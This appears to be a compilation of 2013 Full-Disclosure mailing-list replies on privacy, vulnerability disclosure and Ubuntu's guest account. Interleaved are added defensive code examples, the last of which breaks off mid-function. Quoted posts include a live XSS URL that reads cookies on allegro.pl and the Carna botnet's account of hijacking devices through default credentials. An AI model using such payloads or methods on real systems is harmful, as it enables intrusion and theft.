On Thu, May 16, 2013 at 5:41 PM, Kirils Solovjovs kirils.solovj...@kirils.com wrote: You may have read about this in another list. http://lists.randombit.net/pipermail/cryptography/2013-May/004224.html http://financialcryptography.com/mt/archives/001430.html I'd like to give out some observations and point out some not so obvious risks (as if Microsoft Skypying™ on your conversations is not enough). Requests always come from the same IP, 65.52.100.214. They have referrer and user agent set to a dash "-". They are always HEAD requests which immediately follow 302 redirects. They access both http and https links despite some speculations saying that they do it one way or the other. This is a relatively new phenomenon that by my accounts has been happening since the end of April 2013. ... Back to the point. Now that it's clear that [at least] links from users' private chats somehow magically end up at Redmond, it's obviously a privacy issue of having some usernames/passwords/sessions/whatever embedded in the URL.

There could be legal concerns here too (if a prosecutor takes interest in folks besides the Swartzes of the world). I can't wait to see the first CFAA violation brought against interception services like these. Consider: the owner of the remote server surely did not authorize the interception service to access the site with a user's username and password. That's a clear violation of exceeding one's authority under the CFAA since the interception service had no authority from the server's owners. Jeff
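For an operator who wants to see whether links from their users' chats are being fetched this way, and which of those fetches carried anything sensitive, here is the pattern Kirils describes turned into detection logic over access logs. This is an added example, not code from the post: the source IP and the request shape (HEAD, Referer "-", User-Agent "-", following a 302) come from the post; the log lines are constructed in Apache combined format, and the set of query keys treated as sensitive is an assumption for illustration.

```python
"""Detect the link-prefetch pattern from the post in web server access logs and
flag fetched URLs that carry credentials or session material.

Added example, not code from the post. The source IP and request shape are taken
from the post; the log lines are constructed in Apache combined format and the
list of sensitive query keys is an assumption.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

FETCHER_IP = "65.52.100.214"  # source address reported in the post

COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Query keys that should never reach a third party (assumed list).
SENSITIVE_KEYS = {"token", "access_token", "session", "sessionid", "sid",
                  "password", "passwd", "key", "auth"}


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; None if it does not match."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def is_fetcher_request(rec: Dict[str, str]) -> bool:
    """The shape from the post: HEAD from the fixed IP with '-' Referer and UA."""
    return (rec["ip"] == FETCHER_IP and rec["method"] == "HEAD"
            and rec["referer"] == "-" and rec["ua"] == "-")


def sensitive_parts(url: str) -> List[str]:
    """Reasons a fetched URL is sensitive: userinfo or a sensitive query key."""
    parts = urlsplit(url)
    reasons = []
    if parts.username or parts.password:
        reasons.append("userinfo in URL")
    for key in parse_qs(parts.query, keep_blank_values=True):
        if key.lower() in SENSITIVE_KEYS:
            reasons.append("query key '%s'" % key)
    return reasons


def detect(lines: List[str]) -> List[Dict[str, object]]:
    """One record per fetcher request, noting whether it immediately followed a
    302 from the same source and whether the URL carried anything sensitive."""
    hits = []
    last_status: Dict[str, int] = {}  # per source IP: status of its previous fetch
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_fetcher_request(rec):
            continue
        status = int(rec["status"])
        hits.append({
            "time": rec["time"],
            "path": rec["path"],
            "status": status,
            "followed_redirect": last_status.get(rec["ip"]) == 302,
            "reasons": sensitive_parts(rec["path"]),
        })
        last_status[rec["ip"]] = status
    return hits


# Constructed log excerpt: an ordinary visitor, the fetcher following a 302 to a
# password-reset link, a benign fetch, and a curl HEAD that must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [16/May/2013:17:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
65.52.100.214 - - [16/May/2013:17:01:09 +0000] "HEAD /r/x1 HTTP/1.1" 302 0 "-" "-"
65.52.100.214 - - [16/May/2013:17:01:10 +0000] "HEAD /reset?token=9f8e7d6c HTTP/1.1" 200 0 "-" "-"
65.52.100.214 - - [16/May/2013:17:02:30 +0000] "HEAD /docs/report.pdf HTTP/1.1" 200 0 "-" "-"
198.51.100.9 - - [16/May/2013:17:03:00 +0000] "HEAD /reset?token=abc HTTP/1.1" 200 0 "-" "curl/7.30.0"
"""


def run_sample() -> List[Dict[str, object]]:
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for hit in run_sample():
        flag = "LEAK" if hit["reasons"] else "ok"
        print(hit["time"], hit["status"], hit["path"], flag, ", ".join(hit["reasons"]))
```

Matching on a single source address is brittle by design here; the durable signal is the combination of HEAD, empty Referer and empty User-Agent arriving seconds after a link was shared, and the "followed_redirect" flag is what ties a shortened or tracking link to the final URL that actually leaked. Anything flagged with a reason is a token or session value that should be treated as exposed and rotated, since the fetch itself cannot be undone.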
[Full-disclosure] Q: CVE Database with Programming Language and Failure Classification?
Hi All,

Does anyone know where to find an augmented CVE database with: (1) programming language and (2) failure classification?

For example, CVE-2013-3301 is the Linux kernel, written in C, and the failure is lack of parameter validation. As another example, CVE-2013-3302 would also be the Linux kernel, written in C, with a failure of race condition.

(I'm very interested in aggregated data on all programs/modules written in C/C++/Objective C).

Jeff
Re: [Full-disclosure] VUPEN Security Research - Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555)
On Sat, Apr 20, 2013 at 7:37 PM, Benji m...@b3nji.com wrote:
> Because security engineers are different to a QA department you originally suggested, and you seem to be very ideologist about the scenarios. As we've seen, Oracle's Java product has security engineers and this has not prevented flaws.

Oracle is probably not a good example since it leaves known flaws in the code base. http://www.h-online.com/security/news/item/Java-7-Update-21-closes-security-holes-and-restricts-applets-1843558.html:

    The warnings for Java applets now come in two types: an applet that has a valid certificate generates a warning dialog with the Java logo in it and details of the applet's certificate, but an applet that is signed with an invalid certificate, is unsigned or self-signed, will generate a warning with a yellow shield and warning triangle which is designed to recommend that the applet should not be run.

    There is a problem though with the certificate checking; as The H reported in March, criminals were using revoked certificates as part of their attacks and the Java runtime was doing nothing to check the validity of certificates. On the latest update of Java, this has not changed either; online validation and revocation checks are still off by default.
Re: [Full-disclosure] How do I contact Vodafone Security?
On Mon, Apr 22, 2013 at 9:10 AM, Jann Horn j...@thejh.net wrote:
> does anyone know how I can contact Vodafone Security (preferably a Germany-specific group because I have no idea whether the issue affects people in other countries, too)? I sent a mail to secur...@vodafone.de and it didn't bounce (in case someone from Vodafone is reading this...

I usually use both sec...@example.com and secur...@example.com. One is specified in an RFC (see below), the other was popularized by Microsoft around the same time the RFC was being assembled.

There are a few other addresses published in RFC2142 (http://www.ietf.org/rfc/rfc2142.txt). I usually try them too for good measure. You also have the Technical and Administrative contacts from the WHOIS database (http://whois.domaintools.com/vodafone.de).

> Well, I tried phoning them first (01721212), but the helpdesk person told me she'd need my password for that (of which I currently don't know where exactly it is).

That sounds like Dell and their call routing system (Dell did the same to me a few years ago when trying to report some issues). Are they using the same outsourcing firm???

I think the extra effort to contact the company through well known email addresses and WHOIS contact is a courtesy and due diligence, so good job on that. But face it - if Vodafone were going to acknowledge or respond, it would have happened by now. So you get the 0-day effect with a free conscience.

Jeff
Re: [Full-disclosure] Allegro.pl XSS [0-day]
On Thu, Apr 11, 2013 at 2:33 PM, Swair Mehta swairme...@gmail.com wrote:
> Well try the search on plantronics website. http://www.plantronics.com/us/
> Nobody notified, I couldn't see the contact us link on the first page.

Stay away from the web based stuff since there could be an obscene EULA festering there. You have well known mailboxes from RFC 2142 (as Henri pointed out) and the WHOIS database information which will provide technical and administrative contacts.

Jeff

> On 11-Apr-2013, at 9:28 AM, Kacper Szczesniak kac...@qwe.pl wrote:
>> Hi All!
>>
>> I was looking for a 19 rack mount today and found this XSS instead:
>> http://allegro.pl/listing/listing.php?string=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
>>
>> it turns out to be a custom data-headline attribute that is not properly escaped
>> tested on Firefox 20, Chrome and others need an xss filter bypass
Re: [Full-disclosure] [ MDVSA-2013:101 ] lynx
On Wed, Apr 10, 2013 at 1:36 PM, Peter Thoeny pete...@thoeny.org wrote:
> How about a sensible middle ground? Daily batches of MDVSA vulnerabilities?

Sounds like a good idea - perhaps prepare one bulletin with affected components and provide links to the detailed article. I imagine the folks who prepare and send the bulletins would not mind a reduction in workload (preparing/signing/sending one bulletin vs many bulletins).

> On Apr 10, 2013, at 9:48 AM, Alex wrote:
>> I agree! I hate those MDVSA spam!!
>>
>> On Wed, 10 Apr 2013 17:36:59 +0200, Fabian Wenk fab...@wenks.ch wrote:
>>> Hello Erik
>>>
>>> On 10.04.2013 17:16, Erik Falor wrote:
>>>> On Wed, Apr 10, 2013 at 11:44:22AM +0100, Peter W-S wrote:
>>>>> Is it really necessary to spam the list with a separate email for every issue you want to report? Perhaps one email a week with a link to the full report would suffice?
>>>>
>>>> It is necessary. Waiting a week for a batched email to find out my software has vulnerabilities is not acceptable just because some people insist on reading email on their telephone.
>>>
>>> If you are using Mandriva, then you could and should subscribe directly to the announce or security mailing list there.
>>>
>>> I really prefer the step e.g. Ubuntu (and also some other Linux distribution I do not remember) have taken about 2 years ago. They stopped sending out their security announces to Bugtraq and Full-Disclosure. I would be happy if other distributions or projects, with such high volume of announces, would do the same.
Re: [Full-disclosure] GitHub Login Cookie Failure
On Mon, Apr 8, 2013 at 12:19 PM, Chris Roussel la...@lavabit.com wrote:
> I installed the Import Cookies Export Cookies plugins in my Firefox 20, then I signed in at GitHub and exported my cookies, then I signed out, I cleaned all the cookies in my browser and I started it again, then I imported the cookies and I am logged in without typing my passwords. I've tried this with my Google account, but there it is clear that when I signed out the info in the cookies was annulled, then it appears like I am signed in while I am searching, but if I want to check my mail/drive I have to type my password.

You might also check to see if the session identifier changes between sessions. If not, GitHub may be using static session IDs, which means they could be guessable.

Jeff
Re: [Full-disclosure] Fw: Fw: Justice for Molly (cops killingcivillians)
> Go do illegal activities such as reverse engineering

The DMCA (PUBLIC LAW 105–304) has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING. The STE exemption is in Section 1205 (i) SECURITY TESTING.

Jeff

On Fri, Mar 29, 2013 at 8:00 AM, Jerry dePriest jerr...@mc.net wrote:
> ** who made you the boss of FD? I've seen similar posts and bullshit like April fools jokes posing as 0-day and such. if you don't like it, move along. Go do illegal activities such as reverse engineering for 0-day exploits or holes in facebook so you can scare the rubes. man, try to do something good and I get blasted...
>
> Bryan, there is a short bridge waiting for you to take a long walk... By the looks of your myspace page you're anti social and a troll...
>
> Well, you got me. I forgot New Zealand is just another offshoot of the penal colony Australia used to be. You can't help it, it's in your genes...
>
> Spamming? UCE my mailings were not. They were informative, like this list is supposed to be. You liken my postings to the likes of Netdev and other assholes who truly UCE'd this list to death. btw this is the PERFECT place for this type of discussion. Who made you the fucking moderator of fd? You do a horrible job... I have been on this list since 2005... My postings are gold compared to the viri and other 'spolits people try to con people into.
>
> 1. Let's discuss how his facebook account was hacked along with others so no forensics are available. (Feds, gotta love em)
> 2. Let's discuss how her facebook account was hacked to say she took a bunch of pills THEN shot herself.
> 3. Let's discuss what a douchebag you are for downplaying something by putting it into the scope of a chain letter? That's confirmation you are in fact a true douchebag...
>
> FOAD Antisocial troll... Go remove your myspace page and maybe you won't look like such an ass, whole.
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
On Fri, Mar 29, 2013 at 9:05 AM, Jerry dePriest jerr...@mc.net wrote:
> and this is pertinent to the list? another asshole that posts to the list with bullshit (in my eyes) then you go off on me for what I think is important.

It appears you did not have your bowl of Cheerios this morning.

Who was the young lady? Perhaps a close friend or relative?

Jeff

> ----- Original Message -----
> From: Gary Baribault
> To: full-disclosure@lists.grok.org.uk
> Sent: Monday, January 14, 2013 3:46 PM
> Subject: Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
>
> I didn't know the gentleman, but have known some depressive people. There may have been other problems bothering him in his life, but spending a fortune on a lawyer to try and avoid 30 - 50 years in prison and the reputation that he would have if he ever got out is probably quite near the top of the list of things setting his mind frame and causing this unfortunate decision. The powers that be have blood on their hands and hopefully are having rather poor nights' sleep these days. Personally I would be having trouble looking in the mirror for my daily shave.
>
> Gary Baribault
>
> On 01/14/2013 03:35 PM, valdis.kletni...@vt.edu wrote:
>> On Mon, 14 Jan 2013 11:02:26 -0500, Jeffrey Walton said:
>>> On Mon, Jan 14, 2013 at 10:34 AM, richa...@fastmail.fm wrote:
>>>> https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck
>>>> Above link to remove this prosecutor needs to have signatures by February 11.
>>>
>>> It's unfortunate Swartz committed suicide over the incident.
>>
>> From the fine article: On his blog, Swartz had written of his history of depression. Given that, and the fact that the article doesn't mention a suicide note stating Aaron's reasons, it's not entirely clear that he in fact committed suicide over the incident. It may have been one factor out of many.
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
On Fri, Mar 29, 2013 at 10:48 AM, Steve Wray stevedw...@gmail.com wrote:
> I'm not a moderator (OBVIOUSLY) but I'll just leave this here, from the list charter:
>
> <quote>
> Acceptable Content
>
> Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information.
>
> Gratuitous advertisement, product placement, or self-promotion is forbidden.
>
> Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible.
>
> Humour is acceptable in moderation, providing it is inoffensive.
>
> Politics should be avoided at all costs.
> </quote>
>
> I'm thinking mainly Self promotion and POLITICS... avoided... all costs

It's hard to avoid politics at times, especially when it involves your privacy (or lack thereof) and well being.

Jeff
Re: [Full-disclosure] Port scanning /0 using insecure embedded devices
> Many of them are based on Linux and allow login to standard BusyBox with empty or default credentials.

Forgive my ignorance, but what does the authentication problem (or lack thereof) have to do with linux/uclibc/busybox? It seems to be a manufacturer problem (for example, Actiontec) or an integrator problem (such as Verizon or Comcast), unless I am missing something.

Jeff

On Sun, Mar 17, 2013 at 7:54 PM, internet census internetcensus2...@mail.com wrote:
> - Internet Census 2012 -
> Port scanning /0 using insecure embedded devices
> - Carna Botnet -
>
> While playing around with the Nmap Scripting Engine we discovered an amazing number of open embedded devices on the Internet. Many of them are based on Linux and allow login to standard BusyBox with empty or default credentials.
>
> From March to December 2012 we used ~420 Thousand insecure embedded devices as a distributed port scanner to scan all IPv4 addresses. These scans include service probes for the most common ports, ICMP ping, reverse DNS and SYN scans. We analyzed some of the data to get an estimation of the IP address usage.
>
> All data gathered during our research is released into the public domain for further study. The full 9 TB dataset has been compressed to 565GB using ZPAQ and is available via BitTorrent.
>
> The dataset contains:
> - 52 billion ICMP ping probes
> - 10.5 billion reverse DNS records
> - 180 billion service probe records
> - 2.8 billion sync scan records for 660 million IPs with 71 billion ports tested
> - 80 million TCP/IP fingerprints
> - 75 million IP ID sequence records
> - 68 million traceroute records
>
> This project is, to our knowledge, the largest and most comprehensive IPv4 census ever. With a growing number of IPv6 hosts on the Internet, 2012 may have been the last time a census like this was possible. A full documentation, including statistics and images, can be found on the project page.
>
> We hope other researchers will find the data we have collected useful and that this publication will help raise some awareness that, while everybody is talking about high class exploits and cyberwar, four simple stupid default telnet passwords can give you access to hundreds of thousands of consumer as well as tens of thousands of industrial devices all over the world.
>
> No devices were harmed during this experiment and our botnet has now ceased its activity.
>
> Project Page:
> http://internetcensus2012.bitbucket.org/
> http://internetcensus2012.github.com/InternetCensus2012/
> http://census2012.sourceforge.net/
>
> Torrent MAGNET LINK:
> magnet:?xt=urn:btih:7e138693170629fa7835d52798be18ab2fb847fedn=InternetCensus2012tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80% 2fannouncetr=udp%3a%2f%2ftracker.ccc.de%3a80%2fannouncetr=udp%3a%2f%2ftracker.publicbt.com%3a80%2fannounce
Re: [Full-disclosure] Owning Samsung Android devices
> ...
> Two different vulnerabilities can be exploited to silently install highly-privileged applications with no user interaction. The privileged applications to be installed can be embedded right inside the unprivileged application package, or downloaded on the fly from an on-line market.
>
> Another issue, different from the previous ones, allows attackers to send SMS messages without requiring any Android privilege (normally, Android applications are required to have the android.permission.SEND_SMS permission to perform this task).

You might consider getting Android security involved since both appear to have remediation at the platform level. For example, Google Play may be able to do something about the first issue since it's a trusted channel and should not be distributing hidden apps with malicious intent; and a confused deputy might be in play with the second. Android security can be reached through a well known email address, and Android Security Discussions (http://groups.google.com/group/android-security-discuss).

My apologies if the remediations are not available at the platform. It's tough to discern when folks use Full Disclosure, Bugtraq, et al. to generate traffic and press releases.

Jeff

On Tue, Mar 19, 2013 at 5:20 PM, Roberto Paleari robe...@greyhats.it wrote:
> Folks,
>
> I recently found some security vulnerabilities affecting Samsung Android phones. The bugs lie in Samsung-specific customizations and not in the Android code base.
>
> While waiting for Samsung security patches, I published an overview of the issues here:
> http://randomthoughts.greyhats.it/2013/03/owning-samsung-phones-for-fun-but-with.html
>
> Possible consequences are quite interesting, as the vulnerabilities allow an *unprivileged* application to perform several nefarious tasks, ranging from sending SMS messages to installing APK packages, but also including some denial-of-services and info leaks.
>
> I hope I will be able to disclose the technical details soon.
Re: [Full-disclosure] Arbitrary command execution and trivial password guessing on Brother printers
On Thu, Feb 28, 2013 at 12:55 PM, auto61149...@hushmail.me wrote:
> Confirmation that Brother is aware of vulnerabilities; no fixes planned for any printer
> Can find about a few tens of thousands of Brother printers on just Google Search
> ...

They do it because it's cost effective to do nothing for a defective product. The risk analysis equations need to be unbalanced.

Jeff
Re: [Full-disclosure] test
On Wed, Feb 27, 2013 at 11:05 PM, coderman coder...@gmail.com wrote:
> On Wed, Feb 27, 2013 at 3:13 AM, imipak imi...@gmail.com wrote:
>> SMTP_ECHO_REQUEST
>
> ICMP_SOURCE_QUENCH

+1
Re: [Full-disclosure] #warning -- DICE.COM insecure passwords
On Tue, Feb 12, 2013 at 5:58 PM, Travis Biehn tbi...@gmail.com wrote:
> What Tim said. I think warning was writing about the public shame from having a massive pw dump not having some neckbeard expose them over using crypt on some random industry mailing list (shudders).

Here is a long article on secure password storage. It is extremely exciting: http://www.cigital.com/justice-league-blog/2012/06/11/securing-password-digests-or-how-to-protect-lonely-unemployed-radio-listeners/

I got to attend that talk given at OWASP in Northern Virginia (https://www.owasp.org/index.php/Virginia, JULY 2012). John Steven and did a great job.

Jeff

> On Tue, Feb 12, 2013 at 5:14 PM, Tim tim-secur...@sentinelchicken.org wrote:
>> That's assuming that they didn't do the risk analysis and decide that the effort required to fix the problem (which will probably require, among other things, having every single user change their password) is worth the effort. Given that so many places have gotten hacked and pwned that the user community response is usually Meh. Another one, they may rightfully have concluded that risking public shaming is in fact a good business decision...
>>
>> Here's a bit of pseudocode for you Valdis:
>>
>>     for each user:
>>         let user.new_hash = scrypt(user.old_crypt_hash)
>>
>>     # now update authentication routine to use user.new_hash with new
>>     # nested hashing algorithm
>>
>> So really, there's actually not a good reason to keep a crappy hash database around. Just add a layer of good salted hashing on top. With that said, the unusual quirk of crypt being limited to 7 characters is an additional challenge, but you can start with the above steps (which immediately improves security), and then slowly transition to using scrypt alone or some variant that supports longer passwords.
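Tim's pseudocode carried through as a runnable added example (not code from the thread): the stored crypt hash is wrapped in salted scrypt without knowing the password, and the wrapped record is replaced by scrypt alone the next time the user logs in, which is the "slowly transition" step. The legacy_crypt function is a constructed stand-in that models only crypt(3)'s truncation of the password to its first 8 bytes, and the record format and salt handling are my assumptions.

```python
import hashlib
import hmac
import os


def legacy_crypt(password: str) -> str:
    """Constructed stand-in for the legacy hash (not real crypt(3) output).
    It keeps one property that matters for migration: DES crypt(3) only ever
    looks at the first 8 bytes of the password."""
    return hashlib.sha1(password.encode()[:8]).hexdigest()


# Cost parameters kept small so the example runs quickly; raise n in production.
SCRYPT_PARAMS = dict(n=2 ** 12, r=8, p=1, dklen=32)


def scrypt_hex(secret: bytes, salt: bytes) -> str:
    return hashlib.scrypt(secret, salt=salt, **SCRYPT_PARAMS).hex()


def wrap_legacy_hash(old_hash: str) -> dict:
    """Tim's step 1: wrap the existing crypt hash in salted scrypt. No password
    is needed, so this runs once over the whole user table."""
    salt = os.urandom(16)
    return {"scheme": "scrypt(crypt)", "salt": salt,
            "hash": scrypt_hex(old_hash.encode(), salt)}


def migrate_table(old_table: dict) -> dict:
    """The 'for each user' loop: username -> old crypt hash becomes username -> record."""
    return {user: wrap_legacy_hash(old_hash) for user, old_hash in old_table.items()}


def hash_password(password: str) -> dict:
    """Final scheme: scrypt over the whole password, no crypt truncation."""
    salt = os.urandom(16)
    return {"scheme": "scrypt", "salt": salt,
            "hash": scrypt_hex(password.encode(), salt)}


def verify(record: dict, password: str) -> bool:
    """Tim's step 2: the authentication routine recomputes whichever layering
    the stored record says it used."""
    if record["scheme"] == "scrypt(crypt)":
        inner = legacy_crypt(password).encode()   # crypt first, then scrypt on top
    elif record["scheme"] == "scrypt":
        inner = password.encode()
    else:
        raise ValueError("unknown hash scheme: %r" % record["scheme"])
    candidate = scrypt_hex(inner, record["salt"])
    return hmac.compare_digest(candidate, record["hash"])


def login(record: dict, password: str):
    """Verify, and on success upgrade a wrapped record to plain scrypt now that
    the password is known. Returns (ok, record_to_store)."""
    if not verify(record, password):
        return False, record
    if record["scheme"] == "scrypt(crypt)":
        record = hash_password(password)
    return True, record


if __name__ == "__main__":
    # Constructed one-user table in the legacy format.
    table = migrate_table({"alice": legacy_crypt("correct horse battery")})
    ok, table["alice"] = login(table["alice"], "correct horse battery")
    print(ok, table["alice"]["scheme"])   # True scrypt
```

Until a user logs in, the wrapped record still accepts any password sharing the first 8 bytes with the original, which is exactly the crypt quirk Tim warns about; after the upgrade the full password is required.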
Re: [Full-disclosure] ifIndex overflow (Linux Kernel - net/core/dev.c) [maybe offtopic]
> The former requiring too much effort

I'm not sure I agree with this statement. When Sony pissed off folks over the Playstation, countless hours were spent on the breaks and breach. Confer: http://thehackernews.com/2012/10/sony-playstation-3-hacked-with-custom.html and http://www.nbcnews.com/technology/ingame/hackers-stole-personal-data-playstation-network-123618.

It does not hurt that Sony chronically drives drunk on the information superhighway. Confer: http://attrition.org/security/rants/sony_aka_sownage.html.

Don't underestimate an attacker's will or resolve.

Jeff

On Fri, Feb 8, 2013 at 6:05 AM, Daniel Corbe co...@corbe.net wrote:
> That would require that you have sufficient access to create pseudo-eth devices in the first place. A vector of attack which requires previous privilege escalation or which is carried out by an individual in a position of trust is wholly uninteresting. The former requiring too much effort and the latter requiring a reexamination of your interpersonal relationships.
>
> -Daniel
>
> Daniel Preussker dan...@preussker.net writes:
>> Hi,
>>
>> I was looking into the net/core/dev.c from the current Kernel (previous also have this) and found out that ifIndex gets incremented by an endless loop. After creating 4 billion pseudo-eth devices I finally got it to overflow and endless loop, had to kill the kernel - fun right?
>>
>> General question, is this known?
>>
>> Daniel Preussker
>> [ Security Consultant, Network Protocol Security and Cryptography
>> [ LPI Novell Certified Linux Engineer and Researcher
>> [ +49 178 600 96 30
>> [ dan...@preussker.net
>> [ http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x87E736968E490AA1
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
On Mon, Jan 14, 2013 at 10:34 AM, richa...@fastmail.fm wrote:
> https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck
> Above link to remove this prosecutor needs to have signatures by February 11.

http://www.amazon.com/Three-Felonies-Day-Target-Innocent/dp/1594035229

The prosecutor has a history of abusing her power. See, for example, http://news.ycombinator.com/item?id=5126017.
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
[Sorry about the crummy copy/paste]. Here's the link to the forfeiture article: http://bostonherald.com/news_opinion/local_coverage/2013/01/ortiz_motel_owner_we’re_not_done_yet

On Sat, Feb 2, 2013 at 2:58 PM, Jeffrey Walton noloa...@gmail.com wrote:
> On Mon, Jan 14, 2013 at 10:34 AM, richa...@fastmail.fm wrote:
>> https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck
>> Above link to remove this prosecutor needs to have signatures by February 11.
>
> http://www.amazon.com/Three-Felonies-Day-Target-Innocent/dp/1594035229
>
> The prosecutor has a history of abusing her power. See, for example, http://news.ycombinator.com/item?id=5126017.
Re: [Full-disclosure] Ubuntu, Linux Mint, and the Guest Account
It appears the Guest account is still allowed to wander around a 'stock' install of Ubuntu. Below are some examples of information leakage due to the account.

Surely I'm not the only person who thinks it's a bad idea to allow LightDM (a desktop manager) to be a user manager or security manager. And I can't be the only fellow who thinks it's a bad idea that the account is created in a non-standard way. For example, the account is not in the standard /etc/passwd or /etc/shadow database; and it cannot be disabled or removed with `usermod` or `userdel`.

Finally, I can't be the only person who thinks adding the account surreptitiously is a bad idea. For example, grep'ing 'Guest' returns 0 hits because the lightdm config file lacks a comment on the guest account (and it's enabled by default).

Below is from a fresh Ubuntu Server install:

    guest-XuxS7j@utility:/$ uname -a
    Linux utility.home.pvt 3.2.0-36-generic-pae #57-Ubuntu SMP Tue Jan 8 22:01:06 UTC 2013 i686 i686 i386 GNU/Linux
    guest-XuxS7j@utility:/$ whoami
    guest-XuxS7j

Information leak follows:

    guest-XuxS7j@utility:/$ cd /home/jeffrey
    guest-XuxS7j@utility:/home/jeffrey$ pwd
    /home/jeffrey
    guest-XuxS7j@utility:/home/jeffrey$ cd Documents
    guest-XuxS7j@utility:/home/jeffrey/Documents$

Information leak follows:

    guest-XuxS7j@utility:/home/jeffrey/Documents$ cat foo-bar.txt
    cat: foo-bar.txt: No such file or directory
    guest-XuxS7j@utility:/home/jeffrey/Documents$ cat Financial-Results-2012.txt
    cat: Financial-Results-2012.txt: Permission denied

Root looks clamped:

    guest-XuxS7j@utility:/home/jeffrey/Documents$ cd /root/
    bash: cd: /root/: Permission denied

Perhaps Ubuntu should offer an option to *not* enable the Guest account at install? Perhaps Ubuntu should encrypt all home directories by default since the Guest account is allowed to wander the file system?

And fix the path hack (https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/868363). There's no reason this program should be on path. Was this program acceptance tested? The alternative - removing lightdm - creates an installation that won't boot properly.

On Sat, May 5, 2012 at 7:42 PM, Jeffrey Walton noloa...@gmail.com wrote:
> I know there's not much new here, but I am amazed that Ubuntu, Linux Mint and friends ship with a Guest account present and enabled.
>
> The Guest account is surreptitiously added through a lightdm configuration file, and is not part of the standard user database. Because it's not part of the standard user database, it can't be disabled through /etc/shadow, nor disabled through familiar tools such as userdel and usermod. Additionally, the damn account does not show up in distribution provided tools such as the User Accounts applet.
>
> To make matters worse, grepping for guest returns 0 results because lightdm.conf does not mention one must add the following to disable the guest account (nothing is required to enable the account):
>
>     allow-guest=false
>
> To add insult to injury, the Guest account is not sandboxed and user home directories lack sufficient ACLs, so the guest account is able to wander through users' home directories:
>
>     guest-dojMxl@vb-mint-12-x64 ~ $ pwd
>     /tmp/guest-dojMxl
>     guest-dojMxl@vb-mint-12-x64 ~ $ whoami
>     guest-dojMxl
>     guest-dojMxl@vb-mint-12-x64 /home/jwalton $ cd /home/
>     guest-dojMxl@vb-mint-12-x64 /home $ ls -al
>     total 12
>     drwxr-xr-x  3 root    root    4096 2012-05-05 16:29 .
>     drwxr-xr-x 23 root    root    4096 2012-05-05 16:32 ..
>     drwxr-xr-x  5 jwalton jwalton 4096 2012-05-05 16:35 jwalton
>     guest-dojMxl@vb-mint-12-x64 ~ $ cd /home/jwalton/
>     guest-dojMxl@vb-mint-12-x64 /home/jwalton $ ls -al
>     total 28
>     drwxr-xr-x  5 jwalton jwalton 4096 2012-05-05 16:35 .
>     drwxr-xr-x  3 root    root    4096 2012-05-05 16:29 ..
>     -rw-r--r--  1 jwalton jwalton  220 2012-05-05 16:29 .bash_logout
>     drwx------  3 jwalton jwalton 4096 2012-05-05 16:35 .cache
>     drwxr-xr-x  3 jwalton jwalton 4096 2012-05-05 16:29 .config
>     drwxr-xr-x  4 jwalton jwalton 4096 2012-05-05 16:29 .mozilla
>     -rw-r--r--  1 jwalton jwalton  675 2012-05-05 16:29 .profile
>     ...
>
> Is there any reason a KIOSK-like account is enabled by default? Do KIOSKs really dominate the desktop market to warrant the account out of the box?
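An added audit script (not the author's, and not an Ubuntu or LightDM tool) for the two problems in the posts above: it reports whether allow-guest is still at its enabled default across the LightDM config files, where the key's absence means "enabled", and which home directories carry the drwxr-xr-x mode that let the guest wander in. The /etc/lightdm/lightdm.conf.d/*.conf drop-in path is an assumption, and the fixture the script builds to exercise itself is constructed, not taken from a real system.

```python
import configparser
import glob
import os
import stat
import tempfile
from pathlib import Path

LIGHTDM_CONF = "/etc/lightdm/lightdm.conf"
LIGHTDM_DROPINS = "/etc/lightdm/lightdm.conf.d/*.conf"   # assumed drop-in location


def guest_account_enabled(conf_paths):
    """True unless some config file explicitly sets allow-guest=false.
    A missing key means enabled (the surprise the post describes); when several
    files set the key, the last file in conf_paths wins. Missing files are skipped."""
    enabled = True
    for path in conf_paths:
        parser = configparser.ConfigParser(interpolation=None)
        try:
            if not parser.read(path):          # read() returns the files it could open
                continue
        except configparser.Error:             # unparseable file: it sets nothing
            continue
        for section in parser.sections():      # [SeatDefaults] or [Seat:*], by version
            if parser.has_option(section, "allow-guest"):
                enabled = parser.getboolean(section, "allow-guest")
    return enabled


def world_accessible_homes(home_root):
    """Names of directories under home_root whose 'other' bits grant read or
    execute, i.e. the drwxr-xr-x mode shown in the ls output above."""
    exposed = []
    for entry in sorted(Path(home_root).iterdir()):
        if entry.is_dir() and entry.stat().st_mode & (stat.S_IROTH | stat.S_IXOTH):
            exposed.append(entry.name)
    return exposed


def audit(conf_paths, home_root):
    return {"guest_enabled": guest_account_enabled(conf_paths),
            "open_homes": world_accessible_homes(home_root)}


def make_constructed_fixture():
    """Constructed stand-in for a real system so the audit can run offline:
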